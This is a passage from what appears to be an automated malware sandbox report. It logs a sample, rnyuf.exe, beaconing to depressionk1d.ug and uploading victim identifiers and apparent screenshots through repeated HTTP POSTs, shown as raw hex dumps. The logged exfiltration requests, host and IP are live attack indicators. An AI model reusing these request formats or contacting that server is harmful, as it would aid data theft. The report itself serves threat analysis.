                          Data Ascii: A&+<a_I\]<>~5IJ)*Q]x;Rgi2^w>FeM)j{[nb[yVuP0UH!0OL4TwQwhu:I't*wOzS-|U%,/#-c-f8\=%>VIytY)o$k+x<
                          Nov 12, 2021 22:24:02.480170965 CET9877INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:02 GMT
                          Content-Type: text/html
                          Content-Length: 0
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          X-Powered-By: PHP/5.6.37


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          219192.168.2.450018178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:02.531311989 CET9879OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:02.556371927 CET9879INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:02 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          22192.168.2.449804178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:20.804045916 CET2762OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5
                          Host: depressionk1d.ug
                          Content-Length: 106671
                          Cache-Control: no-cache
                          Nov 12, 2021 22:23:20.804225922 CET2762OUTData Raw: 2d 2d 2d 2d 2d 2d 64 62 31 61 31 31 38 32 39 30 35 34 33 65 62 61 33 66 33 31 37 30 66 64 34 32 66 32 62 38 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------db1a118290543eba3f3170fd42f2b8f5Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:23:20.804445028 CET2772OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:23:20.804574966 CET2775OUTData Raw: c9 35 0e b5 35 bb 21 ce 2b a9 95 45 49 34 7e 54 f2 47 9c ec 62 b9 f5 c5 47 5a 27 72 82 8a 5a 28 01 28 a5 a2 80 12 96 97 14 62 80 12 8a 5a 3b d0 02 51 4b 45 31 06 28 a0 52 d1 60 12 8a 5a 50 29 88 4c 52 d1 8a 0d 00 14 51 8a 5a 00 4c 51 8a 5c 51 8a
                          Data Ascii: 55!+EI4~TGbGZ'rZ((bZ;QKE1(R`ZP)LRQZLQ\QaqR@%((4QJ)h1@KEc4SbF(\e.=iamR,.(cq.)hIv(Qv))X.'4sF(Z9ME4\PE6Z)XbQKE%Q`REJ)iCI
                          Nov 12, 2021 22:23:20.828291893 CET2801OUTData Raw: 42 41 c1 e0 f2 2b ca a9 1e 6a 95 17 9a fc 91 ee aa 9e ce 96 1e 76 4e d1 7b ff 00 8e 64 1a 07 87 e1 d2 2d 33 2a c7 2d ec 8c 64 9a 6c 64 ee 3d 81 3c e0 74 1f 9d 2d c7 85 f4 bb 99 fc c6 8a 55 46 90 48 f0 47 33 2c 4e c3 9c b2 03 82 6b 8a 3a ff 00 88
                          Data Ascii: BA+jvN{d-3*-dld=<t-UFHG3,Nk:,v\]Gw$V5g]/'7mB&f\c/gr34"NlbI?Z"0Lt?EWqQ@%PRS(J3@Q
                          Nov 12, 2021 22:23:20.850832939 CET2803OUTData Raw: 9a 70 aa 44 b1 f4 52 52 d5 12 38 53 81 a6 0a 75 52 25 a2 50 78 a7 e6 a2 06 9c 0d 5a 64 34 48 0d 3c 1a 88 1e 69 cb 56 99 0d 13 03 4f 06 a1 14 fc d5 a6 66 d1 26 68 06 99 9a 50 6a ae 2b 12 06 a7 87 a8 41 a7 83 4d 32 5a 25 0f ef 4f 0f 50 03 4a 0d 51
                          Data Ascii: pDRR8SuR%PxZd4H<iVOf&hPj+AM2Z%OPJQ%!ETPjpErrMS;u#<zNJy^]67N*h+IlFf!Ua9T]H4k*zp)U4aD{STQ{8VHma=8/lNt.8
                          Nov 12, 2021 22:23:20.850860119 CET2809OUTData Raw: 03 c5 28 3c d3 41 a5 26 98 ac 48 0d 3b 39 a8 f7 52 83 54 89 68 7e 69 41 a6 e6 8a a2 6c 48 0d 3b 35 18 a7 53 4c 96 87 e6 9d 9a 8f 34 a0 fb d5 5c 9b 12 03 4e 06 a2 06 9c 0d 32 5a 25 cd 00 d3 33 4a 1a 98 ac 49 9a 01 a6 73 4f 14 c9 b0 e1 52 2f 15 18
                          Data Ascii: (<A&H;9RTh~iAlH;5SL4\N2Z%3JIsOR/2.iY2,M54h<3<SsLICS3OwFX7TwR'}@;4L$*i<}89iAqBxZvO(n??3!T6PY?G:nf;r
                          Nov 12, 2021 22:23:20.850915909 CET2811OUTData Raw: 61 82 fe 55 f8 9d 67 c5 9b 54 b0 f8 61 15 9c 45 8c 70 4b 04 4a 58 f2 42 82 06 7d f8 af 9e ab bd f1 67 c5 1b ef 16 e8 6d a5 dc e9 d6 f0 21 91 64 0f 13 b6 41 1f 5f ad 70 55 78 78 4e 31 7c db dc 55 e5 19 49 72 ed 60 a5 a4 a2 b7 30 0a 29 45 06 80 0a
                          Data Ascii: aUgTaEpKJXB}gm!dA_pUxxN1|UIr`0)E(4;Pzm8P@:AKLBh0E%-Mj-Q@Rm(!L8UNDQL)TKN"GR3N+Si0m(H\QLC?0SZ%)hD@RFSMT'GjL
                          Nov 12, 2021 22:23:20.850935936 CET2814OUTData Raw: 24 f0 cc b2 e9 b1 5d c5 a9 69 f2 49 34 13 5c c1 6a 0c a2 59 a3 89 98 3b 2e 50 2f f0 31 c1 60 70 3a 76 aa e9 a1 dd 3e a7 05 80 96 df cd 9a c8 5f 29 dc 76 88 fc 93 36 0f 1d 76 8f a6 7b f7 ab 17 1e 23 58 b4 0d 2a d2 c2 da cc ea 31 d9 5c 41 35 d9 8e
                          Data Ascii: $]iI4\jY;.P/1`p:v>_)v6v{#X*1\A5A%iTuH@#4?AiDi@`v0wv{c5VIw4[?wWu<j)d2x*pH#SxjKIYuO,Bw@dHjC}&_-r[+YE+9
                          Nov 12, 2021 22:23:20.850991964 CET2817OUTData Raw: d1 0a 29 c2 80 28 02 a0 d1 21 45 2e 38 a0 0a 5c 71 48 a1 cb 52 2d 30 0c 53 85 4b 2d 12 0a 95 7a 54 42 a4 02 b3 66 d1 24 a5 c7 14 d1 4e 15 0c b1 40 af 29 f8 a7 f7 ad 3d dd cf f2 af 57 1d 6b ca 3e 2a 63 cc b2 fa bf f4 ad 68 7c 44 55 e8 78 ae 68 cf
                          Data Ascii: )(!E.8\qHR-0SK-zTBf$N@)=Wk>*ch|DUxh+M@<Gy%jng#3u\ ua[Of.<^5dUWVGQS[vPo+43=4ohdy6||MbzC\CW?9+
                          Nov 12, 2021 22:23:20.851021051 CET2822OUTData Raw: 37 92 6e 14 6d 93 19 da ca c1 86 47 a6 54 57 95 86 9a 85 68 4a 5b 26 bf 33 aa ac 5b 83 4b b1 f2 86 68 07 34 bb 29 42 1a fb ab 1e 06 82 52 d1 b4 d2 ec 34 f5 10 94 52 ec 34 bb 0d 3b 05 cf b4 09 ac a7 3f e9 32 ff 00 be 7f 9d 69 93 59 2e 7f d2 65 ff
                          Data Ascii: 7nmGTWhJ[&3[Kh4)BR4R4;?2iY.e|:JC`1O:_UG_8P<otRc"z20S{Wzy(h/q3Gk*e(M8BM\MKqkGpEboAm=x:4wk,
                          Nov 12, 2021 22:23:20.902765036 CET2872INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:20 GMT
                          Content-Type: text/html
                          Content-Length: 0
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          X-Powered-By: PHP/5.6.37


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          220192.168.2.450020178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:02.714185953 CET10069OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:02.739989042 CET10070INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:02 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          221192.168.2.450022178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:02.873610020 CET10086OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:02.901458979 CET10087INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:02 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0
                          Nov 12, 2021 22:24:02.927686930 CET10087OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5
                          Host: depressionk1d.ug
                          Content-Length: 106671
                          Cache-Control: no-cache
                          Nov 12, 2021 22:24:02.927989006 CET10087OUTData Raw: 2d 2d 2d 2d 2d 2d 64 62 31 61 31 31 38 32 39 30 35 34 33 65 62 61 33 66 33 31 37 30 66 64 34 32 66 32 62 38 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------db1a118290543eba3f3170fd42f2b8f5Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:24:02.928000927 CET10098OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:24:02.928716898 CET10100OUTData Raw: c9 35 0e b5 35 bb 21 ce 2b a9 95 45 49 34 7e 54 f2 47 9c ec 62 b9 f5 c5 47 5a 27 72 82 8a 5a 28 01 28 a5 a2 80 12 96 97 14 62 80 12 8a 5a 3b d0 02 51 4b 45 31 06 28 a0 52 d1 60 12 8a 5a 50 29 88 4c 52 d1 8a 0d 00 14 51 8a 5a 00 4c 51 8a 5c 51 8a
                          Data Ascii: 55!+EI4~TGbGZ'rZ((bZ;QKE1(R`ZP)LRQZLQ\QaqR@%((4QJ)h1@KEc4SbF(\e.=iamR,.(cq.)hIv(Qv))X.'4sF(Z9ME4\PE6Z)XbQKE%Q`REJ)iCI
                          Nov 12, 2021 22:24:02.952507019 CET10108OUTData Raw: 42 41 c1 e0 f2 2b ca a9 1e 6a 95 17 9a fc 91 ee aa 9e ce 96 1e 76 4e d1 7b ff 00 8e 64 1a 07 87 e1 d2 2d 33 2a c7 2d ec 8c 64 9a 6c 64 ee 3d 81 3c e0 74 1f 9d 2d c7 85 f4 bb 99 fc c6 8a 55 46 90 48 f0 47 33 2c 4e c3 9c b2 03 82 6b 8a 3a ff 00 88
                          Data Ascii: BA+jvN{d-3*-dld=<t-UFHG3,Nk:,v\]Gw$V5g]/'7mB&f\c/gr34"NlbI?Z"0Lt?EWqQ@%PRS(J3@Q
                          Nov 12, 2021 22:24:02.952537060 CET10119OUTData Raw: 4a 00 43 4c 27 34 e2 73 4d a4 c6 86 56 cf 86 7f e4 25 27 fd 71 3f cc 56 2d 6d 78 67 fe 42 52 7f d7 13 fc c5 6b 85 fe 34 4c b1 7f c1 91 d5 d6 ff 00 87 3c 21 a9 f8 96 4d d6 c8 23 b6 53 87 b8 93 ee 83 e8 3d 4d 65 e9 96 2f a9 ea 96 d6 48 42 99 a4 09
                          Data Ascii: JCL'4sMV%'q?V-mxgBRk4L<!M#S=Me/HBQ=uG1PimFU'j^7:Q=pXxUwek->uBHwh-$c>*%K+ l=1^Khh.Fz5Zu$(bi
                          Nov 12, 2021 22:24:02.952626944 CET10124OUTData Raw: 06 8d be fa 03 52 e6 d0 29 eb a9 9d b6 8d 80 f6 ad 51 69 6f 2f dc 62 b4 36 95 2f 54 65 6a 9f 6d 1e a6 8a 32 7a a3 24 c0 08 a8 5e d3 22 b5 9a ce 68 fe fc 4d 51 f9 5e d5 4a a4 58 b9 e5 1d cc 29 6c fd ab 3e 7b 2f 6a eb 0d be e1 d2 a0 92 c7 23 ee 9a
                          Data Ascii: R)Qio/b6/Tejm2z$^"hMQ^JX)l>{/j#OFMLIMJtb]i8j:1Tek@,W$DfCt3 ?s)WEpAIo3o)kKXdPt-^6B=yyFxkfy
                          Nov 12, 2021 22:24:02.974900961 CET10136OUTData Raw: 97 a3 cb 25 9f 95 a6 eb da 83 6a 2a d3 db 5a d9 48 86 68 ad d5 8a 6f 7c 44 db 98 95 63 b4 05 00 01 96 39 c8 ca d3 7c 49 a8 e9 10 df 18 59 e6 bc bd b9 86 e2 4b 99 9f 7e fd 82 40 ca e0 83 bc 38 90 83 93 d3 3d 73 57 a0 f1 3e 9d 15 f6 9f 70 de 1f 9c
                          Data Ascii: %j*ZHho|Dc9|IYK~@8=sW>p*_3OXo<F9b1$<V_#_5vE:59[p-fh8QqtAipD+7LgVQo4ZG*EqG|&Z3<#+F2]"
                          Nov 12, 2021 22:24:02.974941969 CET10146OUTData Raw: 47 59 00 45 4d e8 a4 38 23 09 8c a9 f9 54 1e 32 ad 52 71 95 a3 fd 7f 4b fa d4 d2 95 38 c9 5d ff 00 5f d7 f5 b1 49 3c 31 2c 97 13 03 a9 e9 e9 67 1d 9f db 45 f1 69 4c 2f 16 f0 87 1b 50 be 43 36 08 2a 08 c1 cd 36 4f 09 ea 6b 2d c4 70 18 2e 9a 29 2d
                          Data Ascii: GYEM8#T2RqK8]_I<1,gEiL/PC6*6Ok-p.)-<'<l~!4e$-FB$;TpJ\{CRh0qhn*5-wm3Zyiulndf!Y{7M=
                          Nov 12, 2021 22:24:02.974955082 CET10148OUTData Raw: bd f1 0c 9a ce 87 aa d8 e9 31 e8 86 0b 2b 39 54 db 48 20 49 e1 00 2b 3a 11 bb 27 73 1d a7 25 8f ad 56 d2 35 2d 23 4a f0 ce 97 ab 31 d4 a1 4b 3d 76 79 ed 2d a3 d9 2b 4a 44 30 90 92 4b 94 da a7 80 48 43 c1 3c 54 fb 67 6b ff 00 5a bb 0f d9 2b ff 00
                          Data Ascii: 1+9TH I+:'s%V5-#J1K=vy-+JD0KHC<TgkZ+]Ut]U|t7b^:I<mk8{u21.@p2G'WZStwEg* a,).NJEh<C))7c;zqO_O/Ec{_;.$wyF9
                          Nov 12, 2021 22:24:02.974962950 CET10152OUTData Raw: 34 fe b0 fb 69 7b 7e 2f fe 1f fe 18 1e 1d 5e d7 fe bf ad 3d 4e 7e 2d 1b 55 9a c1 6f e2 d2 ef a4 b3 66 08 b7 09 6e e6 32 c4 ed 00 30 18 ce 78 c7 af 15 0c 76 37 93 cc f0 c3 69 71 24 a8 c1 1e 34 89 8b 2b 16 0a 01 00 64 12 c4 0c 7a 9c 56 ef 8a b4 dd
                          Data Ascii: 4i{~/^=N~-Uofn20xv7iq$4+dzVrMf]o4Ffr3[lqx[RSR=+]v/CIa.usFXzqU5'4/."{6FUf<x:j:h%i
                          Nov 12, 2021 22:24:03.041726112 CET10196INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:03 GMT
                          Content-Type: text/html
                          Content-Length: 0
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          X-Powered-By: PHP/5.6.37


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          222192.168.2.450023178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:03.058553934 CET10196OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:03.085665941 CET10197INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:03 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          223192.168.2.450025178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:03.240451097 CET10198OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:03.268760920 CET10199INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:03 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          224192.168.2.450026178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:03.425555944 CET10202OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:03.451467991 CET10202INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:03 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          225192.168.2.450028178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:03.590533018 CET10204OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:03.618005037 CET10206INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:03 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          226192.168.2.450030178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:03.764974117 CET10207OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:03.792697906 CET10208INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:03 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          227192.168.2.450032178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:03.936434984 CET10210OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:03.962680101 CET10210INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:03 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          228192.168.2.450033178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:04.096788883 CET10213OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:04.123820066 CET10213INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:04 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          229192.168.2.450035178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:04.249775887 CET10214OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5
                          Host: depressionk1d.ug
                          Content-Length: 106671
                          Cache-Control: no-cache
